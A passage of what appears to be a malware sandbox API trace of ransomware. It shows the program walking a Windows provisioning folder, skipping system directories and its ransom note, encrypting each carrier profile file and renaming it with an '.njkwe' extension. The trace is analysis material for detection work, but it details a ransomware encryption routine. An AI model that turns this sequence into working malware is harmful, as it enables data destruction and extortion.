pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 192 [0081.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\481__connections_cellular_vodafone uk (united kingdom)_i3$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\481__Connections_Cellular_Vodafone UK (United Kingdom)_i3$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\481__connections_cellular_vodafone uk (united kingdom)_i3$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.092] GetProcessHeap () returned 0xbe0000 [0081.092] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.092] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9117b5eb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9117b5eb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9117b5eb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x35c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml", cAlternateFileName="482__C~1.PRO")) returned 1 [0081.092] lstrcmpiW (lpString1="482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.092] lstrcmpiW (lpString1="482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.092] lstrcmpiW (lpString1="482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.092] lstrcmpiW (lpString1="482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.092] lstrcmpiW (lpString1="482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.092] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml") returned 172 [0081.092] StrStrIW (lpFirst="482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.092] lstrcmpW (lpString1="482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.092] lstrcmpW (lpString1="482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.092] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\482__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.092] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\482__connections_cellular_vodafone uk (united kingdom)_i4$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.092] GetTickCount () returned 0x115495a [0081.092] GetTickCount () returned 0x115495a [0081.092] GetTickCount () returned 0x115495a [0081.092] GetTickCount () returned 0x115495a [0081.092] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.092] GetProcessHeap () returned 0xbe0000 [0081.092] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.093] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x35c, lpOverlapped=0x0) returned 1 [0081.155] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.155] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x35c, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x35c, lpOverlapped=0x0) returned 1 [0081.156] GetProcessHeap () returned 0xbe0000 [0081.156] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.156] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.156] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.156] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.156] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.156] CloseHandle (hObject=0x43c) returned 1 [0081.156] GetProcessHeap () returned 0xbe0000 [0081.156] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.156] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 192 [0081.156] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\482__connections_cellular_vodafone uk (united kingdom)_i4$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\482__Connections_Cellular_Vodafone UK (United Kingdom)_i4$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\482__connections_cellular_vodafone uk (united kingdom)_i4$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.157] GetProcessHeap () returned 0xbe0000 [0081.157] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.157] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9117b5eb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9117b5eb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9117b5eb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x35d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml", cAlternateFileName="483__C~1.PRO")) returned 1 [0081.157] lstrcmpiW (lpString1="483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.157] lstrcmpiW (lpString1="483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.157] lstrcmpiW (lpString1="483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.157] lstrcmpiW (lpString1="483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.158] lstrcmpiW (lpString1="483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.158] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml") returned 172 [0081.158] StrStrIW (lpFirst="483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.158] lstrcmpW (lpString1="483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.158] lstrcmpW (lpString1="483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.158] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\483__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.158] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\483__connections_cellular_vodafone uk (united kingdom)_i5$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.158] GetTickCount () returned 0x11549a8 [0081.158] GetTickCount () returned 0x11549a8 [0081.158] GetTickCount () returned 0x11549a8 [0081.158] GetTickCount () returned 0x11549a8 [0081.158] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.158] GetProcessHeap () returned 0xbe0000 [0081.159] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.159] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x35d, lpOverlapped=0x0) returned 1 [0081.160] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.160] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x35d, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x35d, lpOverlapped=0x0) returned 1 [0081.161] GetProcessHeap () returned 0xbe0000 [0081.161] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.161] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.161] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.161] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.161] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.161] CloseHandle (hObject=0x43c) returned 1 [0081.161] GetProcessHeap () returned 0xbe0000 [0081.161] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.161] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 192 [0081.161] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\483__connections_cellular_vodafone uk (united kingdom)_i5$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\483__Connections_Cellular_Vodafone UK (United Kingdom)_i5$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\483__connections_cellular_vodafone uk (united kingdom)_i5$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.162] GetProcessHeap () returned 0xbe0000 [0081.162] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.162] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9117b5eb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9117b5eb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9117b5eb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="484__C~1.PRO")) returned 1 [0081.165] lstrcmpiW (lpString1="484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0081.165] lstrcmpiW (lpString1="484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0081.165] lstrcmpiW (lpString1="484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0081.165] lstrcmpiW (lpString1="484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0081.165] lstrcmpiW (lpString1="484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0081.165] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0081.165] StrStrIW (lpFirst="484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0081.165] lstrcmpW (lpString1="484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.165] lstrcmpW (lpString1="484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0081.166] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\484__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.166] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\484__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.166] GetTickCount () returned 0x11549a8 [0081.166] GetTickCount () returned 0x11549a8 [0081.166] GetTickCount () returned 0x11549a8 [0081.166] GetTickCount () returned 0x11549a8 [0081.166] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.166] GetProcessHeap () returned 0xbe0000 [0081.167] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.167] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0081.167] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.168] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1e0, lpOverlapped=0x0) returned 1 [0081.168] GetProcessHeap () returned 0xbe0000 [0081.168] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.168] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.168] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.168] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.168] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.169] CloseHandle (hObject=0x43c) returned 1 [0081.169] GetProcessHeap () returned 0xbe0000 [0081.169] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.169] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0081.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\484__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\484__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\484__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.169] GetProcessHeap () returned 0xbe0000 [0081.169] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.169] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9117b5eb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9117b5eb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9117b5eb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml", cAlternateFileName="485__C~1.PRO")) returned 1 [0081.170] lstrcmpiW (lpString1="485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.170] lstrcmpiW (lpString1="485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.170] lstrcmpiW (lpString1="485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.170] lstrcmpiW (lpString1="485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.170] lstrcmpiW (lpString1="485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.170] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml") returned 164 [0081.170] StrStrIW (lpFirst="485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.170] lstrcmpW (lpString1="485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.170] lstrcmpW (lpString1="485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.170] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\485__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.170] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\485__connections_cellular_at&t (united states)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.170] GetTickCount () returned 0x11549a8 [0081.170] GetTickCount () returned 0x11549a8 [0081.170] GetTickCount () returned 0x11549a8 [0081.170] GetTickCount () returned 0x11549a8 [0081.170] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.170] GetProcessHeap () returned 0xbe0000 [0081.170] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.170] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0081.176] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.177] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0081.177] GetProcessHeap () returned 0xbe0000 [0081.177] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 